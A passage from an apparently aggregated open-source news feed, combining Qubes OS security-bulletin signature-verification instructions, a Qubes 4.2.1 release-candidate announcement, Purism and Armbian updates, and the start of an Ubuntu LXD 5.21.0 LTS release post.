https://www.qubes-os.org/security/
</code></pre></div></div>
<p><strong>Source:</strong> <a href="https://github.com/QubesOS/qubes-secpack/blob/345734de68d6994d99f461f26e63a09043d4c09c/QSBs/qsb-101-2024.txt">https://github.com/QubesOS/qubes-secpack/blob/345734de68d6994d99f461f26e63a09043d4c09c/QSBs/qsb-101-2024.txt</a></p>
<h2 id="marek-marczykowski-góreckis-pgp-signature"><a href="https://www.qubes-os.org/team/#marek-marczykowski-g%C3%B3recki">Marek Marczykowski-Górecki</a>’s PGP signature</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-----BEGIN PGP SIGNATURE-----
iQIzBAABCAAdFiEELRdx/k12ftx2sIn61lWk8hgw4GoFAmYAyxAACgkQ1lWk8hgw
4GoD/Q/9GJJpOV2zsq24axcePxhbjx0HKVrhR8oOPZMaVTUmr2hqbuFB+d73DBtE
L6J0bTCst3TPDRvMSCt2xi3bO1KsjCWtgupJZd3KSHa0UZT4XKQN0S4F+mXvwmF1
b7278Wh62e20yN1+GYqmYuIXBOVuMcthCGPS6FtJwJqUWLVhU4Zx4lNqUeSJn03l
x8t5pXUUbLW5ODu0qi+CHIBEarx/GtVuFSc5Tv9GZoS6XTU/HTlc0U43EMRfrGjM
nvE84LTY1U4XxpvoyZ4vBdajruO4d1U+p+F+9CbxcidgKUoS5K9Kn8zNF/QO/o+H
/OC/kcxm3p4UqrLT2bh+3GhFhPPiGZvHsWwbRxpUFczmghU+X2I9VcEjt3ARFAwV
QA2ONCrGs1+PHLKN/SKBJg1Nu2ACj4Sx8kQk11ztjCfM+IqeJnvgDgVuPqkiUvBQ
yaEOoNP22ic2gH+rCV79Wb11Yibsc+9ywZ7PaAea6OEM6ZaXqBkyutOpDbNRGQg8
a7AzPB0/iacfWPdqJ7AhXE2u5ii+DeRZdZYjcmm6E0QE89SeBzYOX2BTnTunc/jX
MwYjl0edZ7I/b89Vja6fXSEYS6LYdTpRL4ZtswfwwAE8fRqdVo7qmPTTU1XoHZYs
jJIM2hxAB+JbEZNPzYL2MtGkkzsb4xMX6LQDEMXEZzjAXIlM5L0=
=SBLT
-----END PGP SIGNATURE-----
</code></pre></div></div>
<p><strong>Source:</strong> <a href="https://github.com/QubesOS/qubes-secpack/blob/345734de68d6994d99f461f26e63a09043d4c09c/QSBs/qsb-101-2024.txt.sig.marmarek">https://github.com/QubesOS/qubes-secpack/blob/345734de68d6994d99f461f26e63a09043d4c09c/QSBs/qsb-101-2024.txt.sig.marmarek</a></p>
<h2 id="simon-gaiser-aka-hw42s-pgp-signature"><a href="https://www.qubes-os.org/team/#simon-gaiser-aka-hw42">Simon Gaiser (aka HW42)</a>’s PGP signature</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-----BEGIN PGP SIGNATURE-----
iQIzBAABCgAdFiEE6hjn8EDEHdrv6aoPSsGN4REuFJAFAmX3fZEACgkQSsGN4REu
FJAHCg/5AYLGAcnMRzZ1JgSJXQLLuQqIXfpNfZWHT4e9u6gkDYcrI4Z4AEzab5Lv
YqSeNbtMys1WCxCUXyPUNG+ZNrD9xcCfmaZuC+MNINwRoAcg+V5+B8cCMU9NUB+V
IquFrepWJcimsBeAvCPkCV4nk1BABqEu0vsViifwFvS0MWr7VFUkQom5/XkXwmZY
uUTrNWSKoJzmzwq3x0yWVNhLmjD2nMg2BKeJUiwpy1wE9Q0w9dLrHEwwewuHP7t1
JAiOFLvEAw55D9Cw8YbOWskIfHWeyhA4a8nrbPVMRTBJAryUgRtDQx6GCcn5uLiM
+/vnYu26UigX9eQy2T/O5fs3ti4BF+/D7XO9QnKXVsmAtSTfvP7/nzY8nWL9SzpB
7cBX5AH9QTHa2Rji/EpqSsZawXXs5pMTWbzObkBORObNgkHUMPOhaM+8qZaEhm5h
DMZrsCHbOsi38pmrXhuIhzY/j5Sk+wp3Wgvkqq4CXO8n7H+jjPNTrMEfcgYI/C8U
U17OvqA/iC/C/z1BRQnhiAp98/fYN6jgNWAGVMBM+XgbrCHExnP/OCH6X5pgTYwY
JbwMyFxv9XuQMDFc9zF4AVPHdAAGssU9qZDZlJg/72Az7J4kxHNlT3m9u02ljmgC
POHJyjO071i6xlCMMEuYyrgT/1qs5NjocpWaXfYSl45a3DWeHMo=
=ZGQ8
-----END PGP SIGNATURE-----
</code></pre></div></div>
<p><strong>Source:</strong> <a href="https://github.com/QubesOS/qubes-secpack/blob/345734de68d6994d99f461f26e63a09043d4c09c/QSBs/qsb-101-2024.txt.sig.simon">https://github.com/QubesOS/qubes-secpack/blob/345734de68d6994d99f461f26e63a09043d4c09c/QSBs/qsb-101-2024.txt.sig.simon</a></p>
<h2 id="what-is-the-purpose-of-this-announcement">What is the purpose of this announcement?</h2>
<p>The purpose of this announcement is to inform the Qubes community that a new Qubes security bulletin (QSB) has been published.</p>
<h2 id="what-is-a-qubes-security-bulletin-qsb">What is a Qubes security bulletin (QSB)?</h2>
<p>A Qubes security bulletin (QSB) is a security announcement issued by the <a href="https://www.qubes-os.org/security/#qubes-security-team">Qubes security team</a>. A QSB typically provides a summary and impact analysis of one or more recently-discovered software vulnerabilities, including details about patching to address them. For a list of all QSBs, see <a href="https://www.qubes-os.org/security/qsb/">Qubes security bulletins (QSBs)</a>.</p>
<h2 id="why-should-i-care-about-qsbs">Why should I care about QSBs?</h2>
<p>QSBs tell you what actions you must take in order to protect yourself from recently-discovered security vulnerabilities. In most cases, security vulnerabilities are addressed by <a href="https://www.qubes-os.org/doc/how-to-update/">updating normally</a>. However, in some cases, special user action is required. In all cases, the required actions are detailed in QSBs.</p>
<h2 id="what-are-the-pgp-signatures-that-accompany-qsbs">What are the PGP signatures that accompany QSBs?</h2>
<p>A <a href="https://en.wikipedia.org/wiki/Pretty_Good_Privacy">PGP</a> signature is a cryptographic <a href="https://en.wikipedia.org/wiki/Digital_signature">digital signature</a> made in accordance with the <a href="https://en.wikipedia.org/wiki/Pretty_Good_Privacy#OpenPGP">OpenPGP</a> standard. PGP signatures can be cryptographically verified with programs like <a href="https://gnupg.org/">GNU Privacy Guard (GPG)</a>. The Qubes security team cryptographically signs all QSBs so that Qubes users have a reliable way to check whether QSBs are genuine. The only way to be certain that a QSB is authentic is by verifying its PGP signatures.</p>
<h2 id="why-should-i-care-whether-a-qsb-is-authentic">Why should I care whether a QSB is authentic?</h2>
<p>A forged QSB could deceive you into taking actions that adversely affect the security of your Qubes OS system, such as installing malware or making configuration changes that render your system vulnerable to attack. Falsified QSBs could sow fear, uncertainty, and doubt about the security of Qubes OS or the status of the Qubes OS Project.</p>
<h2 id="how-do-i-verify-the-pgp-signatures-on-a-qsb">How do I verify the PGP signatures on a QSB?</h2>
<p>The following command-line instructions assume a Linux system with <code class="language-plaintext highlighter-rouge">git</code> and <code class="language-plaintext highlighter-rouge">gpg</code> installed. (For Windows and Mac options, see <a href="https://www.qubes-os.org/security/verifying-signatures/#openpgp-software">OpenPGP software</a>.)</p>
<ol>
<li>
<p>Obtain the Qubes Master Signing Key (QMSK), e.g.:</p>
<div class="language-shell_session highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>gpg <span class="nt">--fetch-keys</span> https://keys.qubes-os.org/keys/qubes-master-signing-key.asc
<span class="go">gpg: directory '/home/user/.gnupg' created
gpg: keybox '/home/user/.gnupg/pubring.kbx' created
gpg: requesting key from 'https://keys.qubes-os.org/keys/qubes-master-signing-key.asc'
gpg: /home/user/.gnupg/trustdb.gpg: trustdb created
gpg: key DDFA1A3E36879494: public key "Qubes Master Signing Key" imported
gpg: Total number processed: 1
gpg: imported: 1
</span></code></pre></div> </div>
<p>(For more ways to obtain the QMSK, see <a href="https://www.qubes-os.org/security/verifying-signatures/#how-to-import-and-authenticate-the-qubes-master-signing-key">How to import and authenticate the Qubes Master Signing Key</a>.)</p>
</li>
<li>
<p>View the fingerprint of the PGP key you just imported. (Note: <code class="language-plaintext highlighter-rouge">gpg></code> indicates a prompt inside of the GnuPG program. Type what appears after it when prompted.)</p>
<div class="language-shell_session highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>gpg <span class="nt">--edit-key</span> 0x427F11FD0FAA4B080123F01CDDFA1A3E36879494
<span class="gp">gpg (GnuPG) 2.2.27;</span><span class="w"> </span>Copyright <span class="o">(</span>C<span class="o">)</span> 2021 Free Software Foundation, Inc.
<span class="go">This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: unknown validity: unknown
[ unknown] (1). Qubes Master Signing Key
</span><span class="gp">gpg></span><span class="w"> </span>fpr
<span class="go">pub rsa4096/DDFA1A3E36879494 2010-04-01 Qubes Master Signing Key
Primary key fingerprint: 427F 11FD 0FAA 4B08 0123 F01C DDFA 1A3E 3687 9494
</span></code></pre></div> </div>
</li>
<li>
<p><strong>Important:</strong> At this point, you still don’t know whether the key you just imported is the genuine QMSK or a forgery. In order for this entire procedure to provide meaningful security benefits, you <em>must</em> authenticate the QMSK out-of-band. <strong>Do not skip this step!</strong> The standard method is to obtain the QMSK fingerprint from <em>multiple independent sources in several different ways</em> and check to see whether they match the key you just imported. For more information, see <a href="https://www.qubes-os.org/security/verifying-signatures/#how-to-import-and-authenticate-the-qubes-master-signing-key">How to import and authenticate the Qubes Master Signing Key</a>.</p>
<p><strong>Tip:</strong> After you have authenticated the QMSK out-of-band to your satisfaction, record the QMSK fingerprint in a safe place (or several) so that you don’t have to repeat this step in the future.</p>
</li>
<li>
<p>Once you are satisfied that you have the genuine QMSK, set its trust level to 5 (“ultimate”), then quit GnuPG with <code class="language-plaintext highlighter-rouge">q</code>.</p>
<div class="language-shell_session highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">gpg></span><span class="w"> </span>trust
<span class="go">pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: unknown validity: unknown
[ unknown] (1). Qubes Master Signing Key
Please decide how far you trust this user to correctly verify other users' keys
(by looking at passports, checking fingerprints from different sources, etc.)
1 = I don't know or won't say
2 = I do NOT trust
3 = I trust marginally
4 = I trust fully
5 = I trust ultimately
m = back to the main menu
Your decision? 5
Do you really want to set this key to ultimate trust? (y/N) y
pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: ultimate validity: unknown
[ unknown] (1). Qubes Master Signing Key
Please note that the shown key validity is not necessarily correct
unless you restart the program.
</span><span class="gp">gpg></span><span class="w"> </span>q
</code></pre></div> </div>
</li>
<li>
<p>Use Git to clone the qubes-secpack repo.</p>
<div class="language-shell_session highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>git clone https://github.com/QubesOS/qubes-secpack.git
<span class="go">Cloning into 'qubes-secpack'...
remote: Enumerating objects: 4065, done.
remote: Counting objects: 100% (1474/1474), done.
remote: Compressing objects: 100% (742/742), done.
remote: Total 4065 (delta 743), reused 1413 (delta 731), pack-reused 2591
Receiving objects: 100% (4065/4065), 1.64 MiB | 2.53 MiB/s, done.
Resolving deltas: 100% (1910/1910), done.
</span></code></pre></div> </div>
</li>
<li>
<p>Import the included PGP keys. (See our <a href="https://www.qubes-os.org/security/pack/#pgp-key-policies">PGP key policies</a> for important information about these keys.)</p>
<div class="language-shell_session highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>gpg <span class="nt">--import</span> qubes-secpack/keys/<span class="k">*</span>/<span class="k">*</span>
<span class="go">gpg: key 063938BA42CFA724: public key "Marek Marczykowski-Górecki (Qubes OS signing key)" imported
gpg: qubes-secpack/keys/core-devs/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key 8C05216CE09C093C: 1 signature not checked due to a missing key
gpg: key 8C05216CE09C093C: public key "HW42 (Qubes Signing Key)" imported
gpg: key DA0434BC706E1FCF: public key "Simon Gaiser (Qubes OS signing key)" imported
gpg: key 8CE137352A019A17: 2 signatures not checked due to missing keys
gpg: key 8CE137352A019A17: public key "Andrew David Wong (Qubes Documentation Signing Key)" imported
gpg: key AAA743B42FBC07A9: public key "Brennan Novak (Qubes Website & Documentation Signing)" imported
gpg: key B6A0BB95CA74A5C3: public key "Joanna Rutkowska (Qubes Documentation Signing Key)" imported
gpg: key F32894BE9684938A: public key "Marek Marczykowski-Górecki (Qubes Documentation Signing Key)" imported
gpg: key 6E7A27B909DAFB92: public key "Hakisho Nukama (Qubes Documentation Signing Key)" imported
gpg: key 485C7504F27D0A72: 1 signature not checked due to a missing key
gpg: key 485C7504F27D0A72: public key "Sven Semmler (Qubes Documentation Signing Key)" imported
gpg: key BB52274595B71262: public key "unman (Qubes Documentation Signing Key)" imported
gpg: key DC2F3678D272F2A8: 1 signature not checked due to a missing key
gpg: key DC2F3678D272F2A8: public key "Wojtek Porczyk (Qubes OS documentation signing key)" imported
gpg: key FD64F4F9E9720C4D: 1 signature not checked due to a missing key
gpg: key FD64F4F9E9720C4D: public key "Zrubi (Qubes Documentation Signing Key)" imported
gpg: key DDFA1A3E36879494: "Qubes Master Signing Key" not changed
gpg: key 1848792F9E2795E9: public key "Qubes OS Release 4 Signing Key" imported
gpg: qubes-secpack/keys/release-keys/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key D655A4F21830E06A: public key "Marek Marczykowski-Górecki (Qubes security pack)" imported
gpg: key ACC2602F3F48CB21: public key "Qubes OS Security Team" imported
gpg: qubes-secpack/keys/security-team/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key 4AC18DE1112E1490: public key "Simon Gaiser (Qubes Security Pack signing key)" imported
gpg: Total number processed: 17
gpg: imported: 16
gpg: unchanged: 1
gpg: marginals needed: 3 completes needed: 1 trust model: pgp
gpg: depth: 0 valid: 1 signed: 6 trust: 0-, 0q, 0n, 0m, 0f, 1u
gpg: depth: 1 valid: 6 signed: 0 trust: 6-, 0q, 0n, 0m, 0f, 0u
</span></code></pre></div> </div>
</li>
<li>
<p>Verify signed Git tags.</p>
<div class="language-shell_session highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span><span class="nb">cd </span>qubes-secpack/
<span class="gp">$</span><span class="w"> </span>git tag <span class="nt">-v</span> <span class="sb">`</span>git describe<span class="sb">`</span>
<span class="go">object 266e14a6fae57c9a91362c9ac784d3a891f4d351
type commit
tag marmarek_sec_266e14a6
tagger Marek Marczykowski-Górecki 1677757924 +0100
Tag for commit 266e14a6fae57c9a91362c9ac784d3a891f4d351
gpg: Signature made Thu 02 Mar 2023 03:52:04 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
</span></code></pre></div> </div>
<p>The exact output will differ, but the final line should always start with <code class="language-plaintext highlighter-rouge">gpg: Good signature from...</code> followed by an appropriate key. The <code class="language-plaintext highlighter-rouge">[full]</code> indicates full trust, which this key inherits in virtue of being validly signed by the QMSK.</p>
</li>
<li>
<p>Verify PGP signatures, e.g.:</p>
<div class="language-shell_session highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span><span class="nb">cd </span>QSBs/
<span class="gp">$</span><span class="w"> </span>gpg <span class="nt">--verify</span> qsb-087-2022.txt.sig.marmarek qsb-087-2022.txt
<span class="go">gpg: Signature made Wed 23 Nov 2022 04:05:51 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
</span><span class="gp">$</span><span class="w"> </span>gpg <span class="nt">--verify</span> qsb-087-2022.txt.sig.simon qsb-087-2022.txt
<span class="go">gpg: Signature made Wed 23 Nov 2022 03:50:42 AM PST
gpg: using RSA key EA18E7F040C41DDAEFE9AA0F4AC18DE1112E1490
gpg: Good signature from "Simon Gaiser (Qubes Security Pack signing key)" [full]
</span><span class="gp">$</span><span class="w"> </span><span class="nb">cd</span> ../canaries/
<span class="gp">$</span><span class="w"> </span>gpg <span class="nt">--verify</span> canary-034-2023.txt.sig.marmarek canary-034-2023.txt
<span class="go">gpg: Signature made Thu 02 Mar 2023 03:51:48 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
</span><span class="gp">$</span><span class="w"> </span>gpg <span class="nt">--verify</span> canary-034-2023.txt.sig.simon canary-034-2023.txt
<span class="go">gpg: Signature made Thu 02 Mar 2023 01:47:52 AM PST
gpg: using RSA key EA18E7F040C41DDAEFE9AA0F4AC18DE1112E1490
gpg: Good signature from "Simon Gaiser (Qubes Security Pack signing key)" [full]
</span></code></pre></div> </div>
<p>Again, the exact output will differ, but the final line of output from each <code class="language-plaintext highlighter-rouge">gpg --verify</code> command should always start with <code class="language-plaintext highlighter-rouge">gpg: Good signature from...</code> followed by an appropriate key.</p>
</li>
</ol>
<p>For this announcement (QSB-101), the commands are:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ gpg --verify qsb-101-2024.txt.sig.marmarek qsb-101-2024.txt
$ gpg --verify qsb-101-2024.txt.sig.simon qsb-101-2024.txt
</code></pre></div></div>
<p>You can also verify the signatures directly from this announcement in addition to or instead of verifying the files from the qubes-secpack. Simply copy and paste the QSB-101 text into a plain text file and do the same for both signature files. Then, perform the same authentication steps as listed above, substituting the filenames above with the names of the files you just created.</p>Qubeshttps://www.qubes-os.org/Qubes OS 4.2.1-rc1 is available for testinghttps://www.qubes-os.org/news/2024/03/16/qubes-os-4-2-1-rc1-available-for-testing/2024-03-16T00:00:00+00:00<p>We’re pleased to announce that the first <a href="https://www.qubes-os.org/feed.xml#what-is-a-release-candidate">release candidate (RC)</a> for Qubes OS 4.2.1 is now available for <a href="https://www.qubes-os.org/doc/testing/">testing</a>. This <a href="https://www.qubes-os.org/feed.xml#what-is-a-patch-release">patch release</a> aims to consolidate all the security patches, bug fixes, and other updates that have occurred since the release of Qubes 4.2.0. Our goal is to provide a secure and convenient way for users to install (or reinstall) the latest stable Qubes release with an up-to-date ISO. The ISO and associated <a href="https://www.qubes-os.org/security/verifying-signatures/">verification files</a> are available on the <a href="https://www.qubes-os.org/downloads/">downloads</a> page. For more information about the changes included in this version, see the <a href="https://github.com/QubesOS/qubes-issues/issues?q=is%3Aissue+is%3Aclosed+reason%3Acompleted+closed%3A2023-12-18..2024-03-14+-label%3A%22R%3A+cannot+reproduce%22+-label%3A%22R%3A+declined%22+-label%3A%22R%3A+duplicate%22+-label%3A%22R%3A+not+applicable%22+-label%3A%22R%3A+self-closed%22+-label%3A%22R%3A+upstream+issue%22+">full list of issues completed since the release of 4.2.0</a>.</p>
<h2 id="when-is-the-stable-release">When is the stable release?</h2>
<p>That depends on the number of bugs discovered in this RC and their severity. As explained in our <a href="https://www.qubes-os.org/doc/version-scheme/#release-schedule">release schedule</a> documentation, our usual process after issuing a new RC is to collect bug reports, triage the bugs, and fix them. If warranted, we then issue a new RC that includes the fixes and repeat the process. We continue this iterative procedure until we’re left with an RC that’s good enough to be declared the stable release. No one can predict, at the outset, how many iterations will be required (and hence how many RCs will be needed before a stable release), but we tend to get a clearer picture of this as testing progresses. Here is the latest update:</p>
<p>At this point, we expect the stable release sometime around 2024-03-25.</p>
<h2 id="testing-qubes-421-rc1">Testing Qubes 4.2.1-rc1</h2>
<p>If you’re willing to <a href="https://www.qubes-os.org/doc/testing/">test</a> this new RC, you can help us improve the eventual stable release by <a href="https://www.qubes-os.org/doc/issue-tracking/">reporting any bugs you encounter</a>. We encourage experienced users to join the <a href="https://forum.qubes-os.org/t/joining-the-testing-team/5190">testing team</a>. The best way to test Qubes 4.2.1-rc1 is by performing a <a href="https://www.qubes-os.org/doc/installation-guide/">clean installation</a> with the new ISO. We strongly recommend <a href="https://www.qubes-os.org/doc/how-to-back-up-restore-and-migrate/">making a full backup</a> beforehand.</p>
<p>As an alternative to a clean installation, there is also the option of performing an in-place upgrade without reinstalling. However, since Qubes 4.2.1 is simply Qubes 4.2.0 inclusive of all updates to date, this amounts to simply using a fully-updated 4.2.0 installation. In a sense, then, all current 4.2.0 users who are keeping up with updates are already testing 4.2.1-rc1, but this testing is only partial, since it does not cover things like the installation procedure.</p>
<h2 id="reminder-new-signing-key-for-qubes-os-42">Reminder: new signing key for Qubes OS 4.2</h2>
<p>As a reminder, we published the following special announcement in <a href="https://www.qubes-os.org/news/2022/09/14/canary-032/">Qubes Canary 032</a> on 2022-09-14:</p>
<blockquote>
<p>We plan to create a new Release Signing Key (RSK) for Qubes OS 4.2. Normally, we have only one RSK for each major release. However, for the 4.2 release, we will be using Qubes Builder version 2, which is a complete rewrite of the Qubes Builder. Out of an abundance of caution, we would like to isolate the build processes of the current stable 4.1 release and the upcoming 4.2 release from each other at the cryptographic level in order to minimize the risk of a vulnerability in one affecting the other. We are including this notice as a canary special announcement since introducing a new RSK for a minor release is an exception to our usual RSK management policy.</p>
</blockquote>
<p>As always, we encourage you to <a href="https://www.qubes-os.org/security/pack/#how-to-obtain-and-authenticate">authenticate</a> this canary by <a href="https://www.qubes-os.org/security/verifying-signatures/">verifying its PGP signatures</a>. Specific instructions are also included in the <a href="https://www.qubes-os.org/news/2022/09/14/canary-032/">canary announcement</a>.</p>
<p>As with all Qubes signing keys, we also encourage you to <a href="https://www.qubes-os.org/security/verifying-signatures/#how-to-import-and-authenticate-release-signing-keys">authenticate</a> the new Qubes OS Release 4.2 Signing Key, which is available in the <a href="https://www.qubes-os.org/security/pack/">Qubes Security Pack (qubes-secpack)</a> as well as on the <a href="https://www.qubes-os.org/downloads/">downloads</a> page.</p>
<h2 id="what-is-a-release-candidate">What is a release candidate?</h2>
<p>A release candidate (RC) is a software build that has the potential to become a stable release, unless significant bugs are discovered in testing. RCs are intended for more advanced (or adventurous!) users who are comfortable testing early versions of software that are potentially buggier than stable releases. You can read more about Qubes OS <a href="https://www.qubes-os.org/doc/supported-releases/">supported releases</a> and the <a href="https://www.qubes-os.org/doc/version-scheme/">version scheme</a> in our documentation.</p>
<h2 id="what-is-a-patch-release">What is a patch release?</h2>
<p>The Qubes OS Project uses the <a href="https://semver.org/">semantic versioning</a> standard. Version numbers are written as <code class="language-plaintext highlighter-rouge"><major>.<minor>.<patch></code>. Hence, we refer to releases that increment the third number as “patch releases.” A patch release does not designate a separate, new major or minor release of Qubes OS. Rather, it designates its respective major or minor release (in this case, 4.2) inclusive of all updates up to a certain point. (See <a href="https://www.qubes-os.org/doc/supported-releases/">supported releases</a> for a comprehensive list of major and minor releases.) Installing the initial Qubes 4.2.0 release and fully <a href="https://www.qubes-os.org/doc/how-to-update/">updating</a> it results in essentially the same system as installing Qubes 4.2.1. You can learn more about how Qubes release versioning works in the <a href="https://www.qubes-os.org/doc/version-scheme/">version scheme</a> documentation.</p>Qubeshttps://www.qubes-os.org/2023 Finance Report: Profitable, More Assets than Liabilities, Over $9m in Sales, 50% Marginhttps://puri.sm/?p=815622024-03-15T17:50:30+00:00<p>Video Read-through of 2023 Year End Financial Update: Slides and Transcript Welcome to Purism’s Investor Report Fiscal Year End 2023. In this report we’re going to go through an executive summary, profit and loss statement, balance sheet, and then conclusion. Executive Summary: All crowdfunded products have been delivered. This is important because the Librem 5 […]</p>
<p>The post <a href="https://puri.sm/posts/2023-finance-report-profitable-more-assets-than-liabilities-over-9m-in-sales-50-margin/" rel="nofollow">2023 Finance Report: Profitable, More Assets than Liabilities, Over $9m in Sales, 50% Margin</a> appeared first on <a href="https://puri.sm/" rel="nofollow">Purism</a>.</p>Todd Weaverhttps://puri.sm/Armbian Leaflet #19https://www.armbian.com/?post_type=newsflash&p=458972024-03-15T09:48:56+00:00<p><span style="color: #000000;">Dear Armbian Community,</span></p>
<p><span style="color: #000000;"><strong>Here are the latest news!</strong></span></p>
<p><span style="color: #000000;">With each new Armbian release, we bring you plenty of improvements. However, we also encounter some new bugs along the way. While some are our own doing, most come from various sources. Much of the software we distribute is common and maintained by third parties upstream, with our main focus on single board computers.</span></p>
<p><span style="color: #000000;"><strong>Challenges and Improvements</strong></span></p>
<p><span style="color: #000000;">During the first week after the release, we faced some problems with the package repository. Our system is highly automated, but sometimes things don’t go smoothly. While trying to improve things, we accidentally caused a delay in updates for two weeks. We’re working hard to fix these issues and make our processes smoother for the future.</span></p>
<p><span style="color: #000000;"><strong>Rockchip Kernel Developments</strong></span></p>
<p><span style="color: #000000;">We’ve been busy improving <a href="https://github.com/armbian/linux-rockchip/tree/rk-6.1-rkr1" rel="noopener" target="_blank">Rockchip vendor kernels</a>, and we’re currently working on porting and testing their new 6.1.y release.</span></p>
<p><span style="color: #000000;"><strong>KDE Plasma Desktop Integration</strong></span></p>
<p><a href="https://cdn.armbian.com/wp-content/uploads/2022/01/Screenshot_20240312_214825.png"><img alt="KDE Neon" class="alignnone wp-image-45890 size-medium" height="169" src="https://cdn.armbian.com/wp-content/uploads/2022/01/Screenshot_20240312_214825-300x169.png" width="300" /></a></p>
<p><span style="color: #000000;">Even though we were in the final stages of our release cycle, we managed to include the brand new release of the <strong>KDE Plasma desktop</strong>. Now, all supported boards come with KDE Plasma Neon v6.1 desktop images, based on the Ubuntu package base. These images offer the latest stable Armbian kernels and LTS package base, without the bloatware or Snap, giving you the best desktop experience.</span></p>
<p><span style="color: #000000;"><strong>Documentation Enhancement Initiative</strong></span></p>
<p><span style="color: #000000;">We’re committed to improving our documentation. We’ve updated our <em>Pull Request templates</em> to make it easier for people to contribute. If you’re interested in helping us improve our documentation, join our upcoming</span> <a href="https://forum.armbian.com/events/event/47-armbian-documentation-follow-up/" rel="noopener" target="_blank">Documentation Follow-up Meeting</a> <span style="color: #000000;">for more collaboration. </span></p>
<p><span style="color: #000000;">Stay tuned for more updates and improvements!</span></p>
<p><span style="color: #000000;">The Armbian team.</span></p>Igor Pečovnikhttps://www.armbian.comUbuntu Blog: LXD 5.21.0 LTS is now availablehttps://ubuntu.com//blog/lxd_5-21-0_lts2024-03-15T09:41:25+00:00<figure class="wp-block-image size-full">
<div class="lazyload">
<noscript>
<img alt="" height="671" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1195,h_671/https://ubuntu.com/wp-content/uploads/3b73/LXD-LTS.png" width="1195" />
</noscript>
</div>
LXD 5.21.0 is now available</figure>
<p>The stable release of LXD, <a href="https://canonical.com/lxd">the system container and VM manager</a>, is now available. LXD 5.21 is the fifth LTS release for LXD, and will be supported for 5 years, until June 2029. This release significantly steps up LXD’s abilities in comparison to LXD 5.0 LTS, especially when operating in clustered environments. LXD 5.21.0 will be licensed under AGPL-3.0-only, in line with the change we <a href="https://discourse.ubuntu.com/t/an-update-on-the-licence-change-and-community-image-server/41549">announced last year</a>. The conditions of the license are designed to encourage those looking to modify the software to contribute back to the project and the broader community. We hope you’ll enjoy what’s in store in this release. Before we jump into features, let’s start with some general changes that come with the new LTS.</p>
<h2 class="wp-block-heading">Change of version numbering scheme</h2>
<p>Starting with this release we are changing the numbering scheme. This is the first LTS release that won’t use the n.0.n format, e.g. 6.0.x, and instead it will be 5.21.x. </p>
<p>What we have followed so far is that each LTS would start a new major version (e.g. 5.0) and each monthly feature release would build on that major version (e.g. 5.1. … 5.20). However, that seemed strange from the perspective of the LTS being an accumulation of all the work that has gone into the monthly releases over the past two years. This is why we decided to change the naming scheme to better reflect that the LTS represents the end of the cycle, rather than the beginning. </p>
<p>Going forward, the last of the monthly releases in the two-year LTS cycle will become the next LTS, in this case, 5.21.0. Then, we will restart the cycle with the first monthly release following the new major version number (e.g. 6.x). To avoid unexpected results for people who assumed the next LTS series would be 6.0.x we will not be releasing LXD 6.0, and the next feature release after this one will be LXD 6.1.</p>
<h2 class="wp-block-heading">LXD UI is now available by default</h2>
<p>As we <a href="https://ubuntu.com/blog/lxd_ui">announced</a>, we now have a dedicated team working on the LXD graphical user interface. We are happy to share that the LXD UI is deemed production grade and is now enabled by default in the LXD snap. We will continue to work on ensuring feature parity of the UI with the CLI. </p>
<p>Keep in mind that the external listener must still be enabled explicitly by setting core.https_address as outlined in the <a href="https://documentation.ubuntu.com/lxd/en/latest/howto/access_ui/">documentation</a>.</p>
<h2 class="wp-block-heading">What’s new in LXD 5.21.0 LTS?</h2>
<p>Over the past two years, we have steadily been enhancing LXD capabilities to become an even more robust and featureful infrastructure tool. In addition to general features, some of the areas we are addressing are aimed at clustered environments, such as when deploying our newly launched <a href="https://canonical.com/microcloud">MicroCloud</a> solution, which builds on LXD. </p>
<h3 class="wp-block-heading">Authentication and authorization revamp </h3>
<p>As part of a push to provide a more industry-standard solution to authentication and authorization in LXD, we’ve added support for OpenID Connect for authentication and additional mechanisms for fine-grained authorization. The combination of these features will allow users to perform secure authentication and fine-grained access control. With the features completed in LXD, this will also be added to the UI in the coming months.</p>
<p>Please note that due to the change in the database, all users who currently authenticate to LXD with OIDC will temporarily lose access to their cluster, and will have to follow <a href="https://documentation.ubuntu.com/lxd/en/latest/api-extensions/#access-management">these steps to authenticate</a>. </p>
<p>More information is available in the documentation about <a href="https://documentation.ubuntu.com/lxd/en/latest/authentication/#openid-connect-authentication">OIDC</a> and <a href="https://documentation.ubuntu.com/lxd/en/latest/explanation/authorization/">fine-grained authorization</a>. </p>
<p>As part of this work, the support for Canonical’s Candid RBAC service has been removed as it is in the process of being deprecated. LXD still supports external OIDC and TLS certificates for authentication.</p>
<h3 class="wp-block-heading">Storage enhancements: Object storage and PowerFlex support</h3>
